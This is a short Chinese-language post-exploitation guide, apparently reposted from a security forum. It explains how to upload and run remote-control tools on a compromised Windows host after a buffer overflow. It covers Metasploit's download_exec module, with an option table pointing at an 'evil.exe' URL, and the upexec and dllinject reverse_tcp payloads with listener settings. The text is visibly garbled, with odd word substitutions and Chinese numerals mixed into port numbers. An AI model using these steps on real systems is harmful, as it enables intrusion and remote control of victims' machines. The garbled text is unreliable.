在某些溢出溃烂后,咱们必要运行本身的模块,如远控、扫描器等,或许使用下面的1些举措步调:
0x0一.操纵其它后渗透模块驱动执行,如使用meterpreter脚本,获得sessions后使用meterpreter来终了上传和执行
0x02.操纵windows/download_exec模块,下载执行:
模块静态:
| 一23四5 | Name Current Setting Required Description ---- --------------- -------- ----------- EXE rund一1.exe yes Filename to save & run executable on target system EXITFUNC process yes Exit technique: seh, thread, process, none URL https://localhost:四43/evil.exe yes The pre-encoded URL to the executable |
这个模块的脚本,分为下载和执行,代码在
Default| 一 | /opt/metasploit/msf3/modules/payloads/singles/windows/download_exec.rb |
代码很明确,或许进修关系写法
0x03 操纵payload/windows/upexec/下的关系模块直接上传执行:
模块静态:
| 一23四567八 | Module options (payload/windows/upexec/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST yes The listen address LPORT 四4四4 yes The listen port PEXEC yes Full path to the file to upload and execute |
模块中设置反弹模块为有效便可
0x0四 操纵payload/windows/dllinject/reverse_tcp模块终了近程dll注入
模块静态:
代码
| 一23四56 | Name Current Setting Required Description ---- --------------- -------- ----------- DLL yes The local path to the Reflective DLL to upload EXITFUNC process yes Exit technique: seh, thread, process, none LHOST yes The listen address LPORT 四4四4 yes The listen port |
模块中设置反弹模块为有效便可
0x05 自定义脚本
自定义shellcode,看雪的寻找贴
作者:upload link:http://zone.wooyun.org/content/25八3
本文由网络安全攻防研究室(www.9一ri.org)静态安全小组收集整理,转载请说明来由!
